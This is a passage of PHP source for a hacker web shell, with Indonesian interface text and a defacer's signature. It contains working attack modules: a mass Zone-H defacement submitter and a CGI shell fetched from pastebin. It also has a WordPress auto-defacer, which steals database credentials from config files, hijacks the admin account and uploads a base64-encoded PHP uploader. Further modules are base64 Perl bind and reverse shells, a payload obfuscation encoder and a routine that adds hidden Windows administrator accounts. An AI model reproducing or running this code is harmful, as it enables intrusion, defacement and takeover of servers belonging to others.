1470. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1471. return curl_exec($ch);
1472. curl_close($ch);
1473. }
1474. foreach($domain as $url) {
1475. $zoneh = zoneh($url,$nick);
1476. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1477. echo "$url -> <font color=white>OK</font><br>";
1478. } else {
1479. echo "$url -> <font color=red>ERROR</font><br>";
1480. }
1481. }
1482. } else {
1483. echo "<center><form method='post'>
1484. <u>Defacer</u>: <br>
1485. <input type='text' name='nick' size='50' value='Mr.4c1L Cr0tZz'><br>
1486. <u>Domains</u>: <br>
1487. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1488. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1489. </form>";
1490. }
1491. echo "</center>";
1492. } elseif($_GET['do'] == 'cgi') {
1493. $cgi_dir = mkdir('idx_cgi', 0755);
1494. $file_cgi = "idx_cgi/cgi.izo";
1495. $isi_htcgi = "AddHandler cgi-script .izo";
1496. $htcgi = fopen(".htaccess", "w");
1497. fwrite($htcgi, $isi_htcgi);
1498. fclose($htcgi);
1499. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1500. $cgi = fopen($file_cgi, "w");
1501. fwrite($cgi, $cgi_script);
1502. fclose($cgi);
1503. chmod($file_cgi, 0755);
1504. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1505. } elseif($_GET['do'] == 'fake_root') {
1506. ob_start();
1507. $cwd = getcwd();
1508. $ambil_user = explode("/", $cwd);
1509. $user = $ambil_user[2];
1510. if($_POST['reverse']) {
1511. $site = explode("\r\n", $_POST['url']);
1512. $file = $_POST['file'];
1513. foreach($site as $url) {
1514. $cek = getsource("$url/~$user/$file");
1515. if(preg_match("/hacked/i", $cek)) {
1516. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
1517. }
1518. }
1519. } else {
1520. echo "<center><form method='post'>
1521. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1522. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1523. Domain: <br>
1524. <textarea style='width: 450px; height: 250px;' name='url'>";
1525. reverse($_SERVER['HTTP_HOST']);
1526. echo "</textarea><br>
1527. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1528. </form><br>
1529. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1530. }
1531. } elseif($_GET['do'] == 'adminer') {
1532. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1533. function adminer($url, $isi) {
1534. $fp = fopen($isi, "w");
1535. $ch = curl_init();
1536. curl_setopt($ch, CURLOPT_URL, $url);
1537. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1538. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1539. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1540. curl_setopt($ch, CURLOPT_FILE, $fp);
1541. return curl_exec($ch);
1542. curl_close($ch);
1543. fclose($fp);
1544. ob_flush();
1545. flush();
1546. }
1547. if(file_exists('adminer.php')) {
1548. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1549. } else {
1550. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1551. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1552. } else {
1553. echo "<center><font color=red>gagal buat file adminer bossque</font></center>";
1554. }
1555. }
1556. } elseif($_GET['do'] == 'auto_dwp') {
1557. if($_POST['auto_deface_wp']) {
1558. function anucurl($sites) {
1559. $ch = curl_init($sites);
1560. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1561. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1562. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1563. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1564. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1565. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1566. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1567. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1568. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1569. $data = curl_exec($ch);
1570. curl_close($ch);
1571. return $data;
1572. }
1573. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1574. $post = array(
1575. "log" => "$userr",
1576. "pwd" => "$pass",
1577. "rememberme" => "forever",
1578. "wp-submit" => "$wp_submit",
1579. "redirect_to" => "$web",
1580. "testcookie" => "1",
1581. );
1582. $ch = curl_init($cek);
1583. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1584. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1585. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1586. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1587. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1588. curl_setopt($ch, CURLOPT_POST, 1);
1589. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1590. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1591. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1592. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1593. $data = curl_exec($ch);
1594. curl_close($ch);
1595. return $data;
1596. }
1597. $scan = $_POST['link_config'];
1598. $link_config = scandir($scan);
1599. $script = htmlspecialchars($_POST['script']);
1600. $user = "Acil123";
1601. $pass = "Acil123";
1602. $passx = md5($pass);
1603. foreach($link_config as $dir_config) {
1604. if(!is_file("$scan/$dir_config")) continue;
1605. $config = file_get_contents("$scan/$dir_config");
1606. if(preg_match("/WordPress/", $config)) {
1607. $dbhost = ambilkata($config,"DB_HOST', '","'");
1608. $dbuser = ambilkata($config,"DB_USER', '","'");
1609. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1610. $dbname = ambilkata($config,"DB_NAME', '","'");
1611. $dbprefix = ambilkata($config,"table_prefix = '","'");
1612. $prefix = $dbprefix."users";
1613. $option = $dbprefix."options";
1614. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1615. $db = mysql_select_db($dbname);
1616. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1617. $result = mysql_fetch_array($q);
1618. $id = $result[ID];
1619. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1620. $result2 = mysql_fetch_array($q2);
1621. $target = $result2[option_value];
1622. if($target == '') {
1623. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1624. } else {
1625. echo "[+] $target <br>";
1626. }
1627. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1628. if(!$conn OR !$db OR !$update) {
1629. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1630. mysql_close($conn);
1631. } else {
1632. $site = "$target/wp-login.php";
1633. $site2 = "$target/wp-admin/theme-install.php?upload";
1634. $b1 = anucurl($site2);
1635. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1636. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1637. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1638. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1639. $www = "m.php";
1640. $fp5 = fopen($www,"w");
1641. fputs($fp5,$upload3);
1642. $post2 = array(
1643. "_wpnonce" => "$anu2",
1644. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1645. "themezip" => "@$www",
1646. "install-theme-submit" => "Install Now",
1647. );
1648. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1649. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1650. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1651. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1652. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1653. curl_setopt($ch, CURLOPT_POST, 1);
1654. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1655. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1656. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1657. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1658. $data3 = curl_exec($ch);
1659. curl_close($ch);
1660. $y = date("Y");
1661. $m = date("m");
1662. $namafile = "id.php";
1663. $fpi = fopen($namafile,"w");
1664. fputs($fpi,$script);
1665. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1666. curl_setopt($ch6, CURLOPT_POST, true);
1667. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1668. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1669. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1670. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1671. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1672. $postResult = curl_exec($ch6);
1673. curl_close($ch6);
1674. $as = "$target/k.php";
1675. $bs = anucurl($as);
1676. if(preg_match("#$script#is", $bs)) {
1677. echo "[+] <font color='white'>berhasil mepes...</font><br>";
1678. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1679. } else {
1680. echo "[-] <font color='red'>gagal mepes bossque...</font><br>";
1681. echo "[!!] coba aja manual: <br>";
1682. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1683. echo "[+] username: <font color=white>$user</font><br>";
1684. echo "[+] password: <font color=white>$pass</font><br><br>";
1685. }
1686. mysql_close($conn);
1687. }
1688. }
1689. }
1690. } else {
1691. echo "<center><h1>WordPress Auto Deface</h1>
1692. <form method='post'>
1693. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1694. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Mr.4c1L Cr0tZz' required><br>
1695. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar boss!!'>
1696. </form>
1697. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1698. </center>";
1699. }
1700. } elseif($_GET['do'] == 'auto_dwp2') {
1701. if($_POST['auto_deface_wp']) {
1702. function anucurl($sites) {
1703. $ch = curl_init($sites);
1704. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1705. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1706. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1707. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1708. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1709. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1710. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1711. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1712. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1713. $data = curl_exec($ch);
1714. curl_close($ch);
1715. return $data;
1716. }
1717. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1718. $post = array(
1719. "log" => "$userr",
1720. "pwd" => "$pass",
1721. "rememberme" => "forever",
1722. "wp-submit" => "$wp_submit",
1723. "redirect_to" => "$web",
1724. "testcookie" => "1",
1725. );
1726. $ch = curl_init($cek);
1727. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1728. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1729. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1730. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1731. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1732. curl_setopt($ch, CURLOPT_POST, 1);
1733. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1734. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1735. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1736. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1737. $data = curl_exec($ch);
1738. curl_close($ch);
1739. return $data;
1740. }
1741. $link = explode("\r\n", $_POST['link']);
1742. $script = htmlspecialchars($_POST['script']);
1743. $user = "Acil123";
1744. $pass = "Acil123";
1745. $passx = md5($pass);
1746. foreach($link as $dir_config) {
1747. $config = anucurl($dir_config);
1748. $dbhost = ambilkata($config,"DB_HOST', '","'");
1749. $dbuser = ambilkata($config,"DB_USER', '","'");
1750. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1751. $dbname = ambilkata($config,"DB_NAME', '","'");
1752. $dbprefix = ambilkata($config,"table_prefix = '","'");
1753. $prefix = $dbprefix."users";
1754. $option = $dbprefix."options";
1755. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1756. $db = mysql_select_db($dbname);
1757. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1758. $result = mysql_fetch_array($q);
1759. $id = $result[ID];
1760. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1761. $result2 = mysql_fetch_array($q2);
1762. $target = $result2[option_value];
1763. if($target == '') {
1764. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1765. } else {
1766. echo "[+] $target <br>";
1767. }
1768. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1769. if(!$conn OR !$db OR !$update) {
1770. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1771. mysql_close($conn);
1772. } else {
1773. $site = "$target/wp-login.php";
1774. $site2 = "$target/wp-admin/theme-install.php?upload";
1775. $b1 = anucurl($site2);
1776. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1777. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1778. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1779. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1780. $www = "m.php";
1781. $fp5 = fopen($www,"w");
1782. fputs($fp5,$upload3);
1783. $post2 = array(
1784. "_wpnonce" => "$anu2",
1785. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1786. "themezip" => "@$www",
1787. "install-theme-submit" => "Install Now",
1788. );
1789. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1790. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1791. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1792. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1793. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1794. curl_setopt($ch, CURLOPT_POST, 1);
1795. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1796. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1797. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1798. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1799. $data3 = curl_exec($ch);
1800. curl_close($ch);
1801. $y = date("Y");
1802. $m = date("m");
1803. $namafile = "id.php";
1804. $fpi = fopen($namafile,"w");
1805. fputs($fpi,$script);
1806. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1807. curl_setopt($ch6, CURLOPT_POST, true);
1808. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1809. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1810. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1811. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1812. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1813. $postResult = curl_exec($ch6);
1814. curl_close($ch6);
1815. $as = "$target/k.php";
1816. $bs = anucurl($as);
1817. if(preg_match("#$script#is", $bs)) {
1818. echo "[+] <font color='white'>berhasil mepes...</font><br>";
1819. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1820. } else {
1821. echo "[-] <font color='red'>gagal mepes bossque...</font><br>";
1822. echo "[!!] coba aja manual: <br>";
1823. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1824. echo "[+] username: <font color=white>$user</font><br>";
1825. echo "[+] password: <font color=white>$pass</font><br><br>";
1826. }
1827. mysql_close($conn);
1828. }
1829. }
1830. } else {
1831. echo "<center><h1>WordPress Auto Deface V.2</h1>
1832. <form method='post'>
1833. Link Config: <br>
1834. <textarea name='link' placeholder='http://target.com/Cr0tz_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1835. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Mr.4c1L Cr0tZz' required><br>
1836. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1837. </form></center>";
1838. }
1839. } elseif($_GET['do'] == 'network') {
1840. echo "<form method='post'>
1841. <u>Bind Port:</u> <br>
1842. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1843. <input type='submit' name='sub_bp' value='>>'>
1844. </form>
1845. <form method='post'>
1846. <u>Back Connect:</u> <br>
1847. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1848. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1849. <input type='submit' name='sub_bc' value='>>'>
1850. </form>";
1851. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1852. if(isset($_POST['sub_bp'])) {
1853. $f_bp = fopen("/tmp/bp.pl", "w");
1854. fwrite($f_bp, base64_decode($bind_port_p));
1855. fclose($f_bp);
1856.  
1857. $port = $_POST['port_bind'];
1858. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1859. sleep(1);
1860. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1861. unlink("/tmp/bp.pl");
1862. }
1863. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1864. if(isset($_POST['sub_bc'])) {
1865. $f_bc = fopen("/tmp/bc.pl", "w");
1866. fwrite($f_bc, base64_decode($bind_connect_p));
1867. fclose($f_bc);
1868.  
1869. $ipbc = $_POST['ip_bc'];
1870. $port = $_POST['port_bc'];
1871. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1872. sleep(1);
1873. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1874. unlink("/tmp/bc.pl");
1875. }
1876. } elseif($_GET['do'] == 'endec') {
1877. $text = $_POST['code'];
1878. echo "<center>
1879. <form method='post'><br>
1880. <textarea placeholder='MASUKIN TEXT YANG MAU DI ENCRYPT/DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
1881. <select class='inputz' size='1' name='ope'>
1882. <option value='urlencode'>url</option>
1883. <option value='json'>json</option>
1884. <option value='ur'>convert_uu</option>
1885. <option value='base64'>Base64</option>
1886. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
1887. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
1888. <option value='coeg'>gzinflate - base64</option>
1889. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
1890. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
1891. <option value='str2'>str_rot13 - base64</option>
1892. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
1893. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
1894. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 - base64</option>
1895. <option value='gzpress'>gzcompress - base64</option>
1896. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
1897. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
1898. </form>";
1899. $submit = $_POST['submit'];
1900. if (isset($submit)){
1901. $op = $_POST["ope"];
1902. switch ($op) {case 'base64': $codi=base64_encode($text);
1903. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
1904. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
1905. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
1906. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
1907. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
1908. break;case 'urlencode' : $codi=rawurlencode($text);
1909. break;case 'ur' : $codi=convert_uuencode($text);
1910. break;case 'json' : $codi=json_encode(utf8_encode($text));
1911. break;case 'str2' : $codi=base64_encode(str_rot13($text));
1912. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
1913. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
1914. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
1915. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
1916. break;default:break;}}
1917. $submit = $_POST['submits'];
1918. if (isset($submit)){
1919. $op = $_POST["ope"];
1920. switch ($op) {case 'base64': $codi=base64_decode($text);
1921. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1922. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
1923. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
1924. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
1925. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
1926. break;case 'urlencode' : $codi=rawurldecode($text);
1927. break;case 'ur' : $codi=convert_uudecode($text);
1928. break;case 'json' : $codi=utf8_decode(json_decode($text));
1929. break;case 'str2' : $codi=str_rot13(base64_decode($text));
1930. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
1931. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
1932. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
1933. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
1934. break;default:break;}}
1935. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
1936. fwrite($myfile, $codi);
1937. fclose($myfile);
1938. echo "<center><div id='kotakan'><br>
1939. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
1940. } elseif($_GET['do'] == 'krdp_shell') {
1941. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1942. if($_POST['create']) {
1943. $user = htmlspecialchars($_POST['user']);
1944. $pass = htmlspecialchars($_POST['pass']);
1945. if(preg_match("/$user/", exe("net user"))) {
1946. echo "[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font>";
1947. } else {
1948. $add_user = exe("net user $user $pass /add");
1949. $add_groups1 = exe("net localgroup Administrators $user /add");
1950. $add_groups2 = exe("net localgroup Administrator $user /add");
1951. $add_groups3 = exe("net localgroup Administrateur $user /add");
1952. echo "[ RDP ACCOUNT INFO ]<br>
1953. ------------------------------<br>
1954. IP: <font color=white>".$ip."</font><br>
1955. Username: <font color=white>$user</font><br>
1956. Password: <font color=white>$pass</font><br>
1957. ------------------------------<br><br>
1958. [ STATUS ]<br>
1959. ------------------------------<br>
1960. ";
1961. if($add_user) {
1962. echo "[add user] -> <font color='white'>Berhasil</font><br>";
1963. } else {
1964. echo "[add user] -> <font color='red'>Gagal</font><br>";
1965. }
1966. if($add_groups1) {
1967. echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
1968. } elseif($add_groups2) {
1969. echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
1970. } elseif($add_groups3) {
1971. echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
1972. } else {
1973. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1974. }
1975. echo "------------------------------<br>";
1976. }
1977. } elseif($_POST['s_opsi']) {
1978. $user = htmlspecialchars($_POST['r_user']);
1979. if($_POST['opsi'] == '1') {
1980. $cek = exe("net user $user");
1981. echo "Checking username <font color=white>$user</font> ....... ";
1982. if(preg_match("/$user/", $cek)) {
1983. echo "[ <font color=white>Sudah ada</font> ]<br>
1984. ------------------------------<br><br>
1985. <pre>$cek</pre>";
1986. } else {
1987. echo "[ <font color=red>belum ada</font> ]";
1988. }
1989. } elseif($_POST['opsi'] == '2') {
1990. $cek = exe("net user $user Davnisial");
1991. if(preg_match("/$user/", exe("net user"))) {
1992. echo "[change password: <font color=red>Mr.4c1L Cr0tZz</font>] -> ";
1993. if($cek) {
1994. echo "<font color=white>Berhasil</font>";
1995. } else {
1996. echo "<font color=red>Gagal</font>";
1997. }
1998. } else {
1999. echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
2000. }
2001. } elseif($_POST['opsi'] == '3') {
2002. $cek = exe("net user $user /DELETE");
